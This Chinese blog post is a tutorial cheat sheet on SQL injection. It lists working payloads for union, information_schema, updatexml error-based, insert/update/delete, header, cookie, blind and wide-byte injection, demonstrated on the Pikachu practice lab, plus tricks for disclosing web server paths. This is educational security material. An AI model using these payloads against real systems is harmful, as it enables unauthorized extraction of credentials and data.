<!DOCTYPE html>
<html lang="zh-Hans">
<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="future.zhangyan">



    <meta name="description" content="未来可期">



<title>sql注入 | Hexo</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 5.1.1"></head>

<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">张艳&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/categories">Categories</a>
                
                    <a class="menu-item" href="/tags">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">张艳&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/categories">Categories</a>
                
                    <a class="menu-item" href="/tags">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">sql注入</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">future.zhangyan</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">September 12, 2020&nbsp;&nbsp;20:01:26</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h2 id="注入总结图"><a href="#注入总结图" class="headerlink" title="注入总结图"></a>注入总结图</h2><p><img src="/image/%E8%84%91%E5%9B%BE/%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93.png"></p>
<h4 id="1-0-原理"><a href="#1-0-原理" class="headerlink" title="1.0 原理"></a>1.0 原理</h4><p>注入产生的原因是接受相关参数未经处理直接带入数据库查询操作</p>
<h4 id="1-1-攻击条件"><a href="#1-1-攻击条件" class="headerlink" title="1.1 攻击条件"></a>1.1 攻击条件</h4><ul>
<li><strong>确定Web应用程序所使用的技术</strong><ul>
<li>可以考察Web页面的页脚</li>
<li>查看错误页面</li>
<li>检查页面源代码</li>
<li>使用诸如Nessus、AWVS、APPSCAN等工具来进行刺探</li>
</ul>
</li>
<li><strong>确定所有可能的输入方式</strong><ul>
<li>HTML表单</li>
<li>通过隐藏的HTML表单输入、HTTP头部、cookies、甚至对用户不可见的后端AJAX请求来跟Web应用进行交互M</li>
<li>HTTP的GET和POST</li>
</ul>
</li>
<li><strong>查找可以用于注射的用户输入</strong><ul>
<li>多留意Web应用的错误页面</li>
</ul>
</li>
</ul>
<h4 id="1-2-注入前的准备及注入漏洞检测"><a href="#1-2-注入前的准备及注入漏洞检测" class="headerlink" title="1.2  注入前的准备及注入漏洞检测"></a>1.2  注入前的准备及注入漏洞检测</h4><ol>
<li><p>显示友好HTTP错误信息</p>
<ul>
<li>取消IE浏览器返回信息设置，以便查看到注入攻击时返回的数据库信息</li>
<li>打开IE浏览器，选择菜单“工具”一“Internet选项”命令，打开“Internet选项”对话框。打开“高级”选项卡，在“设置”列表框中找到“浏览组”，取消勾选“显示友好HTTP错误信息”</li>
</ul>
</li>
<li><p>手工检测sql注入点</p>
<ul>
<li><p>寻找如下形式的网页链接。（最常见）</p>
<p><a target="_blank" rel="noopener" href="http://www.*****.com/***.asp?id=xx">http://www.*****.com/***.asp?id=xx</a> (ASP注入)</p>
<p><a target="_blank" rel="noopener" href="http://www.*****.com/index.asp?id=8&amp;page=99">http://www.*****.com/index.asp?id=8&amp;page=99</a> </p>
<p>(注:注入的时候确认是id参数还是page参数，工具默认只对后面page参数注入，所以要对工具进行配置或者手工调换) </p>
</li>
<li><p>检测方法</p>
<ul>
<li><strong>“单引号”法</strong></li>
<li><strong>1=1和1=2法</strong></li>
</ul>
</li>
</ul>
</li>
</ol>
<h4 id="1-3-注入分类"><a href="#1-3-注入分类" class="headerlink" title="1.3  注入分类"></a>1.3  注入分类</h4><ol>
<li><p>数字型(or 1=1)</p>
<ul>
<li><p>通过burp抓包输入一个or 1=1设置一个payload,点击提交后，在Render中查看结果。通过判断存在SQL注入，且为数字型注入，可以通过拼接SQL语句来实现注入。</p>
<p><img src="/image/sql/sql-1.png"></p>
</li>
</ul>
</li>
<li><p>字符型(‘or 1=1#’)</p>
<ul>
<li><p>在vince后面添加单引号来闭合vince，再在1=1后面添加注释#来消除掉后面的单引号，这样来完成一个SQL语句的拼接合法性。完整的语句为select id,email from member where username=’vince‘ or 1=1#’；我们回到pikachu平台输入vince‘ or 1=1#</p>
<p><img src="/image/sql/sql-2.png"></p>
</li>
</ul>
</li>
<li><p>搜索型(%xxxx%’or 1=1 #%’)</p>
<ul>
<li><p>将拼接语句写为%xxxx%’or 1=1 #%’</p>
<p><img src="/image/sql/sql-3.png"></p>
</li>
</ul>
</li>
<li><p>xx型(XX’) or 1=1#)</p>
<ul>
<li><p>XX型是由于SQL语句拼接方式不同</p>
</li>
<li><p>拼接语句写为XX’) or 1=1#</p>
<p><img src="/image/sql/sql-4.png"></p>
</li>
</ul>
</li>
</ol>
<h4 id="1-4-注入提交方式"><a href="#1-4-注入提交方式" class="headerlink" title="1.4  注入提交方式"></a>1.4  注入提交方式</h4><p>ASP：request （全部接受）、request.querystring （接受get）、request.form （接受post）、 request.cookie cookie （接受cookie）</p>
<p>PHP:<code> $_REQUEST（全部接受）</code>、<code>$_GET $_POST （接受post）</code>、<code>$_COOKIE（接受cookie）</code></p>
<h4 id="1-5-注入攻击类型与方式"><a href="#1-5-注入攻击类型与方式" class="headerlink" title="1.5   注入攻击类型与方式"></a>1.5   <strong>注入攻击类型与方式</strong></h4><ul>
<li><p>union注入</p>
<ul>
<li><p>union操作符用于合并两个或多个SQL语句集合起来，得到联合的查询结果</p>
<p><strong>select id,email from member where username=’kevin’ union select username,pw from member where id=1;</strong></p>
<p><strong>注：union操作符一般与order by语句配合使用</strong></p>
<ul>
<li><p>输入a’ order by 3#% ，通过这个简单的办法找到主查询一共有三个字段</p>
<p><img src="/image/sql/sql-5.png"></p>
</li>
<li><p>之后我们来使用union来做一个SQL语句的拼接。输入构造好的语句a’ union select database(),user(),version()#%</p>
<p><img src="/image/sql/sql-6.png"></p>
</li>
</ul>
</li>
</ul>
</li>
<li><p>information_schema注入</p>
<ul>
<li>information_schema数据库是MySQL系统自带的数据库</li>
<li>通过information_schema注入，我们可以将整个数据库内容全部窃取出来, <ul>
<li>使用order by来判断查询的字段</li>
<li>找出数据库的名称，输入vince’ union select database(),user(),3#%</li>
<li>获取pikachu数据库的<strong>表名</strong>，输入:u’ union select table_schema ,table_name,3 from information_schema.tables where table_schema=’pikachu’#</li>
<li>获取pikachu数据库的<strong>字段名</strong>，输入： k’ union select table_name,column_name,3 from information_schema.columns where table_name=’users’#%</li>
<li>最后获取<strong>字段值</strong>的内容，输入：kobe’union select username ,password,3 from users#%</li>
</ul>
</li>
</ul>
</li>
<li><p>基于函数的报错</p>
<ul>
<li><p>条件：后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端</p>
</li>
<li><p><strong>三个常用的用来报错的函数</strong></p>
<ul>
<li><p>updatexml（）:函数是MYSQL对XML文档数据进行查询和修改的XPATH函数.</p>
<p>1、爆数据库版本信息</p>
<p>k’ and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) #</p>
<p>2、爆数据库当前用户</p>
<p>k’ and  updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)#  </p>
<p>3、爆数据库</p>
<p>k’ and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) #</p>
<p>4、爆表</p>
<p>获取数据库表名，输入：k’and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=’pikachu’)),0)#，但是反馈回的错误表示只能显示一行，所以采用limit来一行一行显示</p>
<p>输入k’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=’pikachu’limit 0,1)),0)#更改limit后面的数字limit 0完成表名遍历。</p>
<p>5、爆字段</p>
<p>获取字段名，输入：k’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=’users’limit <strong>2</strong>,1)),0)#</p>
<p>6、爆字段内容</p>
<p>获取字段内容，输入：k’ and  updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#</p>
</li>
<li><p>extractvalue（） :函数也是MYSQL对XML文档数据进行查询的XPATH函数.</p>
</li>
<li><p>floor（）:MYSQL中用来取整的函数.</p>
</li>
</ul>
</li>
</ul>
</li>
<li><p>insert注入</p>
<ul>
<li><p>前端注册的信息最终会被后台通过insert这个操作插入数据库，后台在接受前端的注册数据时没有做防SQL注入的处理</p>
</li>
<li><p>进入网站注册页面，填写网站注册相关信息，通过Burp抓包在用户名输入相关payload</p>
<p>oldboy’or updatexml(1,concat(0x7e,(命令)),0) or’</p>
<p>\1. 爆表名</p>
<p>oldboy’or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=’pikachu’ limit 0,1)),0) or’</p>
<p><img src="/image/sql/wps1.jpg" alt="img"> </p>
<p>\2. 爆列名</p>
<p>‘ or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=’users’limit 2,1)),0) or’</p>
<p><img src="/image/sql/wps2.jpg" alt="img"> </p>
<p>\3. 爆内容</p>
<p>‘ or updatexml(1,concat(0x7e,(select password from users limit 0,1)),0) or’ 等同</p>
<p>‘ or updatexml(1,concat(0x7e,(select password from users limit 0,1)),0) or ‘1’=’1’’</p>
</li>
</ul>
</li>
<li><p>uodate注入</p>
<ul>
<li><p>与insert注入的方法大体相同，区别在于update用于用户登陆端，insert用于用于用户注册端</p>
<p>‘ or updatexml(0,concat(0x7e,(database())),0) or’</p>
</li>
</ul>
</li>
<li><p>dalete注入</p>
<ul>
<li><p>一般应用于前后端发贴、留言、用户等相关删除操作，点击删除按钮时可通过Brup Suite抓包，对数据包相关delete参数进行注入</p>
<p>delete from message where id=56 or updatexml(2,concat(0x7e,(database())),0)</p>
</li>
</ul>
</li>
<li><p>http header注入</p>
<ul>
<li>User-Agent输入payload Mozilla’ or updatexml(1,concat(0x7e,database ()),0) or ‘html&gt;</li>
</ul>
</li>
<li><p>cookie注入</p>
<ul>
<li>如果后端获取Cookie后放在数据库中进行拼接，那么这也将是一个SQL注入点</li>
<li>在 ant[uname]=admin后添加一个’观察反馈的MYSQL的语法报错，发现了存在SQL注入漏洞，在设置Payload ‘and updatexml (1,concat(0x7e,database()),0)#,观察报错和之前是否相同</li>
</ul>
</li>
<li><p>盲注(base on boolian)、盲注(base on time)</p>
<ul>
<li><p>布尔盲注</p>
<ul>
<li><p>在SQL注入过程中，SQL语句执行选择后，选择的数据不能回显到前端，我们需要使用一些特殊的方法进行判断或尝试，这个过程称为盲注。</p>
<p>输入语句select ascii(substr(database(),1,1))&gt;xx;通过对比ascii码的长度，判断出数据库表名的第一个字符。</p>
<p><strong>注: substr()函数</strong></p>
<p>string(必需)规定要返回其中一部分的字符串。start(必需)规定在字符串的何处开始。length(可选)规定被返回字符串的长度。</p>
</li>
<li><p>在实际操作中通常不会使用手动盲注的办法，可以使用sqlmap等工具来增加盲注的效率。</p>
</li>
</ul>
</li>
<li><p>时间盲注</p>
<ul>
<li><p>payload: vince’ and sleep(x)#</p>
</li>
<li><p>vince’ and if(substr(database(),1,1)=’X’ (猜测点)’,sleep(10),null#</p>
<p>输入后，如果猜测真确，那么就会响应10秒，如果错误会立刻返回错误。</p>
</li>
<li><p>输入：vince’ and if(substr(database(),1,1)=’p’,sleep(10),null)#</p>
<p>在web控制台下，判断出database的表名的一个字符为p</p>
</li>
</ul>
</li>
</ul>
</li>
<li><p>宽字节注入</p>
<ul>
<li><p>当我们把php.ini文件里面的magic_quotes_gqc参数设为ON时，所有的’（单引号），”(双引号)，(反斜杠)和null字符都会被自动加上一个反斜杠进行转义。还有很多函数有类似的作用如：addslashes()、mysql_escape_string()、mysql_real_escape_string()等，另外还有parse_str()后的变量也受magic_quotes_gpc的影响。目前大多数的主机都打开了这个选项，并且很多程序员也注意使用上面那些函数去过滤变量，这看上去很安全，很多漏洞查找者或者工具遇到这些函数过滤后的变量直接就放弃，但是就在他们放弃的同时也放过很多致命的安全漏洞。</p>
<p>其中\的十六进制是 %5C ，当我们在单引号前面加上%df的时候，最终就会变成 運’，如果程序的默认字符集是GBK等宽字节字符集，则MYSQL用GBK的编码时，会认为 %df 是一个宽字符，也就是運，也就是说：%df\’ = %df%5c%27=縗’，有了单引号就好注入了。</p>
<p>‘ =======&gt;&#39;单引号转义后占两个字节，所以我们需要通过繁体字%df构造两个字节,最终用運干掉了\，也就是说被運占领了\ 所以最后在页面也不会显示出来.</p>
</li>
<li><p><strong>哪些地方没有魔术引号的保护？</strong></p>
<p>（1） $_SERVER 变量</p>
<p>  PHP5的$_SERVER变量缺少magic_quotes_gqc的保护，导致近年来X-Forwarded-For的漏洞猛爆，所以很多程序员考虑过滤X-Forwarded-For，但是其它的变量呢？</p>
<p>（2）getenv()得到的变量（使用类似$_SERVER 变量）</p>
<p>（3）$HTTP_RAW_POST_DATA与PHP输入、输出流</p>
</li>
</ul>
</li>
</ul>
<ol>
<li><p>内置变量爆数据库类型</p>
<p>“User”是SQL Server的一个内置变量，它的值是当前连接的用户名，其变量类型为“nvarchar”字符型</p>
<p>方法：在注入点之后提交   and user&gt;0</p>
<p>错误信息：</p>
<p>​    Microsoft OLE DB Provider for SQL Server 错误’80040e21’（MS SQL数据库）</p>
<p>​    将nvarchar值’’转换为数据类型为int的列时发生语法错误。（Access数据库）</p>
</li>
</ol>
<h4 id="1-6实战"><a href="#1-6实战" class="headerlink" title="1.6实战"></a>1.6实战</h4><p> access 数据库<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/fc1e26d3ad45">https://www.jianshu.com/p/fc1e26d3ad45</a></p>
<p>mysql 数据库<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/f98ab1b4b12e">https://www.jianshu.com/p/f98ab1b4b12e</a></p>
<h4 id="1-7获取Web路径"><a href="#1-7获取Web路径" class="headerlink" title="1.7获取Web路径"></a>1.7<strong>获取Web路径</strong></h4><p>(1)一般可以在变量后面加上单引号、改变参数类型、增加参数位数等来造成MySQL数据库出错，爆出Web物理路径。</p>
<p>（2）通过扫描器扫web服务器遗留文件 php.php、info.php、phpinfo.php、test.php</p>
<p>（3）利用搜索引擎来查找Web目录。搜索引擎有时候会对网站页面进行快照抓取，包括脚本出错页面，因此可利用搜索引擎查找网站的出错信息，从而获得网站的物理路径。可在Google或百度中搜索“mysql site:<strong><em>.com”或“warning site:</em></strong>.com,error site:***.com.cn”等。</p>
<p>这里使用“error site:***.com”关键字进行查询，从搜索结果中得到了网站的物理路径为“E:\pujing2015”。</p>
<p>(4) 漏洞暴路径，例如通过网站后台查看网站Web路径、CC攻击暴路径等.</p>
<p>(6)通过配置文件找网站路径,在百度里面输入***配置文件,如:IIS6.0配置文件，可以找到: C:\WINDOWS\system32\inetsrv\MetaBase.xml 和C:\WINDOWS\system32\inetsrv\MetaBase.bin 这两个配置文件（小技巧:在百度里面输入:load_file()常用敏感信息，就可以找到别人入侵过程中总结的常用敏感文件路径）。</p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>future.zhangyan</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://zhangyanlady.github.io/2020/09/12/sql%E6%B3%A8%E5%85%A5/">https://zhangyanlady.github.io/2020/09/12/sql%E6%B3%A8%E5%85%A5/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>The future can be expected, the world is worth it.</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"># 网络安全</a>
                    
                        <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"># 渗透测试</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2020/09/12/PHP%E5%8F%8Amysql%E6%95%B0%E6%8D%AE%E5%BA%93/">PHP及mysql数据库</a>
            
            
            <a class="next" rel="next" href="/2020/09/12/%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F%E6%8A%80%E6%9C%AF/">应用程序技术</a>
            
        </section>


    </article>
</div>

        </div>
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>© future.zhangyan | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>
</html>
